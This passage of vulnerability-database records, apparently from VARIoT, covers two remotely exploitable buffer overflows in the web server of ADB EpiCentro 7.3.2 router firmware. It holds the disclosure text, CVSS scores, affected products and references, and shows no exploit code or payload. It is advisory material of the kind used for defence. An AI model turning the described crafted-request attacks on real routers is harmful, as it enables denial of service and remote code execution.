CVE-2018-7632 Buffer Overflow in ADB EpiCentro 7.3.2+ httpd leading to a Denial of Service condition https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632 Product: EpiCentro Vendor: ADB Global Tested Version: 7.3.2 CVE ID: 2018-7632 Severity: severe Severity Rating: CVSS v3 Base Score: 7,5 AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Impact: Denial of Service Locally Exploitable: no Remotely Exploitable: Yes Explanation: https://fschallock.wordpress.com/2018/10/08/cve-2018-7632-buffer-overflow-in-httpd-in-epicentro-e_7-3-2-allows-attackers-to-cause-a-denial-of-service-attack-remotely-via-a-specially-crafted-get-request/ https://fschallock.wordpress.com/2018/10/08/cve-2018-7632-buffer-overflow-in-httpd-in-epicentro-e_7-3-2-allows-attackers-to-cause-a-denial-of-service-attack-remotely-via-a-specially-crafted-get-request/
-
CVE-2018- 7631 Buffer Overflow in ADB EpiCentro 7.3.2+ httpd leading to Remote Code Execution (RCE) https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632 Product: EpiCentro Vendor: ADB Global Tested Version: 7.3.2 CVE ID: 2018-7631 Severity: critical Severity Rating: CVSS v3 Base Score: 10,0 AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H Impact: Code Execution Locally Exploitable: no Remotely Exploitable: Yes
Explanation: https://fschallock.wordpress.com/2018/10/07/cve-2018-7631-rce-in-adb-epicentro-7-3-2-httpd/ https://fschallock.wordpress.com/2018/10/07/cve-2018-7631-rce-in-adb-epicentro-7-3-2-httpd/
The vulnerabilities were discovered and disclosed to the manufacturer ADB and the ISP A1 Telekom Austria prior to general public announcement. In accordance to information received from both parties a fix has been produced and rolled out to all customers / devices. I have not examined the fix and therefore can not comment on its effectivity.
Felix
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201810-1456",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "epicentro",
"scope": "eq",
"trust": 1.6,
"vendor": "adbglobal",
"version": "7.3.2"
},
{
"model": "epicentro",
"scope": "eq",
"trust": 0.8,
"vendor": "adb",
"version": "7.3.2"
},
{
"model": "epicentro e 7.3.2+",
"scope": null,
"trust": 0.6,
"vendor": "adb",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20873"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011655"
},
{
"db": "NVD",
"id": "CVE-2018-7631"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-487"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:adbglobal:epicentro:7.3.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7631"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Felix Schallock",
"sources": [
{
"db": "PACKETSTORM",
"id": "149976"
}
],
"trust": 0.1
},
"cve": "CVE-2018-7631",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-7631",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-20873",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-7631",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-7631",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2018-20873",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201810-487",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20873"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011655"
},
{
"db": "NVD",
"id": "CVE-2018-7631"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-487"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Buffer Overflow in httpd in EpiCentro E_7.3.2+ allows attackers to execute code remotely via a specially crafted GET request without a leading \"/\" and without authentication. Epicentro Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ADBEpicentro is a set of firmware used by ADB in Switzerland for use in ADB gateways and routers. Httpd is one of the HTTP servers. A buffer overflow vulnerability exists in httpd in the ADBEpicentroE_7.3.2+ release. CVE-2018-7633 Script Injection in ADB EpiCentro 7.3.2+ login form language parameter https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7633 \u003chttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7633\u003e \nProduct: EpiCentro\nVendor: ADB Global\nTested Version: 7.3.2\nCVE ID: 2018-7633\nSeverity: medium\nSeverity Rating: CVSS v3 Base Score: 5,4 AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N\nImpact: Execution of injected Javascript\nLocally Exploitable: no\nRemotely Exploitable: Yes\nExplanation: https://fschallock.wordpress.com/2018/10/08/cve-2018-7633-script-injection-in-the-login-form-language-parameter-of-adb-firmware-epicentro-7-3-2/ \u003chttps://fschallock.wordpress.com/2018/10/08/cve-2018-7633-script-injection-in-the-login-form-language-parameter-of-adb-firmware-epicentro-7-3-2/\u003e \n\n2. CVE-2018-7632 Buffer Overflow in ADB EpiCentro 7.3.2+ httpd leading to a Denial of Service condition https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632 \u003chttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632\u003e \nProduct: EpiCentro\nVendor: ADB Global\nTested Version: 7.3.2\nCVE ID: 2018-7632\nSeverity: severe\nSeverity Rating: CVSS v3 Base Score: 7,5 AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\nImpact: Denial of Service\nLocally Exploitable: no\nRemotely Exploitable: Yes\nExplanation: https://fschallock.wordpress.com/2018/10/08/cve-2018-7632-buffer-overflow-in-httpd-in-epicentro-e_7-3-2-allows-attackers-to-cause-a-denial-of-service-attack-remotely-via-a-specially-crafted-get-request/ \u003chttps://fschallock.wordpress.com/2018/10/08/cve-2018-7632-buffer-overflow-in-httpd-in-epicentro-e_7-3-2-allows-attackers-to-cause-a-denial-of-service-attack-remotely-via-a-specially-crafted-get-request/\u003e\n\n3. CVE-2018- 7631 Buffer Overflow in ADB EpiCentro 7.3.2+ httpd leading to Remote Code Execution (RCE) https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632 \u003chttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632\u003e \nProduct: EpiCentro\nVendor: ADB Global\nTested Version: 7.3.2\nCVE ID: 2018-7631\nSeverity: critical\nSeverity Rating: CVSS v3 Base Score: 10,0 AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\nImpact: Code Execution\nLocally Exploitable: no\nRemotely Exploitable: Yes\n\nExplanation: https://fschallock.wordpress.com/2018/10/07/cve-2018-7631-rce-in-adb-epicentro-7-3-2-httpd/ \u003chttps://fschallock.wordpress.com/2018/10/07/cve-2018-7631-rce-in-adb-epicentro-7-3-2-httpd/\u003e \n\nThe vulnerabilities were discovered and disclosed to the manufacturer ADB and the ISP A1 Telekom Austria prior to general public announcement. In accordance to information received from both parties a fix has been produced and rolled out to all customers / devices. I have not examined the fix and therefore can not comment on its effectivity. \n\nFelix\n\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7631"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011655"
},
{
"db": "CNVD",
"id": "CNVD-2018-20873"
},
{
"db": "PACKETSTORM",
"id": "149976"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-7631",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011655",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-20873",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201810-487",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "149976",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20873"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011655"
},
{
"db": "PACKETSTORM",
"id": "149976"
},
{
"db": "NVD",
"id": "CVE-2018-7631"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-487"
}
]
},
"id": "VAR-201810-1456",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20873"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20873"
}
]
},
"last_update_date": "2023-12-18T13:23:55.716000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.adbglobal.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-011655"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-011655"
},
{
"db": "NVD",
"id": "CVE-2018-7631"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "https://fschallock.wordpress.com/2018/10/07/cve-2018-7631-rce-in-adb-epicentro-7-3-2-httpd/"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7631"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7631"
},
{
"trust": 0.1,
"url": "https://fschallock.wordpress.com/2018/10/08/cve-2018-7632-buffer-overflow-in-httpd-in-epicentro-e_7-3-2-allows-attackers-to-cause-a-denial-of-service-attack-remotely-via-a-specially-crafted-get-request/"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7632\u003e"
},
{
"trust": 0.1,
"url": "https://fschallock.wordpress.com/2018/10/08/cve-2018-7633-script-injection-in-the-login-form-language-parameter-of-adb-firmware-epicentro-7-3-2/"
},
{
"trust": 0.1,
"url": "https://fschallock.wordpress.com/2018/10/07/cve-2018-7631-rce-in-adb-epicentro-7-3-2-httpd/\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7632"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7633"
},
{
"trust": 0.1,
"url": "https://fschallock.wordpress.com/2018/10/08/cve-2018-7633-script-injection-in-the-login-form-language-parameter-of-adb-firmware-epicentro-7-3-2/\u003e"
},
{
"trust": 0.1,
"url": "https://fschallock.wordpress.com/2018/10/08/cve-2018-7632-buffer-overflow-in-httpd-in-epicentro-e_7-3-2-allows-attackers-to-cause-a-denial-of-service-attack-remotely-via-a-specially-crafted-get-request/\u003e"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7633"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7633\u003e"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7632"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20873"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011655"
},
{
"db": "PACKETSTORM",
"id": "149976"
},
{
"db": "NVD",
"id": "CVE-2018-7631"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-487"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-20873"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011655"
},
{
"db": "PACKETSTORM",
"id": "149976"
},
{
"db": "NVD",
"id": "CVE-2018-7631"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-487"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-20873"
},
{
"date": "2019-01-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-011655"
},
{
"date": "2018-10-26T23:22:22",
"db": "PACKETSTORM",
"id": "149976"
},
{
"date": "2018-10-09T22:29:01.750000",
"db": "NVD",
"id": "CVE-2018-7631"
},
{
"date": "2018-10-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201810-487"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-20873"
},
{
"date": "2019-01-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-011655"
},
{
"date": "2018-12-10T16:59:35.417000",
"db": "NVD",
"id": "CVE-2018-7631"
},
{
"date": "2018-10-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201810-487"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201810-487"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Epicentro Buffer error vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-011655"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201810-487"
}
],
"trust": 0.6
}
}
VAR-201810-1457
Vulnerability from variot - Updated: 2023-12-18 13:23Buffer Overflow in httpd in EpiCentro E_7.3.2+ allows attackers to cause a denial of service attack remotely via a specially crafted GET request with a leading "/" in the URL. Epicentro Contains a buffer error vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. ADBEpicentro is a set of firmware used by ADB in Switzerland for use in ADB gateways and routers. Httpd is one of the HTTP servers. A buffer overflow vulnerability exists in httpd in the ADBEpicentroE_7.3.2+ release. CVE-2018-7633 Script Injection in ADB EpiCentro 7.3.2+ login form language parameter https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7633 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7633 Product: EpiCentro Vendor: ADB Global Tested Version: 7.3.2 CVE ID: 2018-7633 Severity: medium Severity Rating: CVSS v3 Base Score: 5,4 AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N Impact: Execution of injected Javascript Locally Exploitable: no Remotely Exploitable: Yes Explanation: https://fschallock.wordpress.com/2018/10/08/cve-2018-7633-script-injection-in-the-login-form-language-parameter-of-adb-firmware-epicentro-7-3-2/ https://fschallock.wordpress.com/2018/10/08/cve-2018-7633-script-injection-in-the-login-form-language-parameter-of-adb-firmware-epicentro-7-3-2/
-
CVE-2018-7632 Buffer Overflow in ADB EpiCentro 7.3.2+ httpd leading to a Denial of Service condition https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632 Product: EpiCentro Vendor: ADB Global Tested Version: 7.3.2 CVE ID: 2018-7632 Severity: severe Severity Rating: CVSS v3 Base Score: 7,5 AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Impact: Denial of Service Locally Exploitable: no Remotely Exploitable: Yes Explanation: https://fschallock.wordpress.com/2018/10/08/cve-2018-7632-buffer-overflow-in-httpd-in-epicentro-e_7-3-2-allows-attackers-to-cause-a-denial-of-service-attack-remotely-via-a-specially-crafted-get-request/ https://fschallock.wordpress.com/2018/10/08/cve-2018-7632-buffer-overflow-in-httpd-in-epicentro-e_7-3-2-allows-attackers-to-cause-a-denial-of-service-attack-remotely-via-a-specially-crafted-get-request/
-
CVE-2018- 7631 Buffer Overflow in ADB EpiCentro 7.3.2+ httpd leading to Remote Code Execution (RCE) https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632 Product: EpiCentro Vendor: ADB Global Tested Version: 7.3.2 CVE ID: 2018-7631 Severity: critical Severity Rating: CVSS v3 Base Score: 10,0 AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H Impact: Code Execution Locally Exploitable: no Remotely Exploitable: Yes
Explanation: https://fschallock.wordpress.com/2018/10/07/cve-2018-7631-rce-in-adb-epicentro-7-3-2-httpd/ https://fschallock.wordpress.com/2018/10/07/cve-2018-7631-rce-in-adb-epicentro-7-3-2-httpd/
The vulnerabilities were discovered and disclosed to the manufacturer ADB and the ISP A1 Telekom Austria prior to general public announcement. In accordance to information received from both parties a fix has been produced and rolled out to all customers / devices. I have not examined the fix and therefore can not comment on its effectivity.
Felix
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201810-1457",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "epicentro",
"scope": "eq",
"trust": 1.6,
"vendor": "adbglobal",
"version": "7.3.2"
},
{
"model": "epicentro",
"scope": "eq",
"trust": 0.8,
"vendor": "adb",
"version": "7.3.2"
},
{
"model": "epicentro e 7.3.2+",
"scope": null,
"trust": 0.6,
"vendor": "adb",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20660"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011654"
},
{
"db": "NVD",
"id": "CVE-2018-7632"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-488"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:adbglobal:epicentro:7.3.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7632"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Felix Schallock",
"sources": [
{
"db": "PACKETSTORM",
"id": "149976"
}
],
"trust": 0.1
},
"cve": "CVE-2018-7632",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-7632",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-20660",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
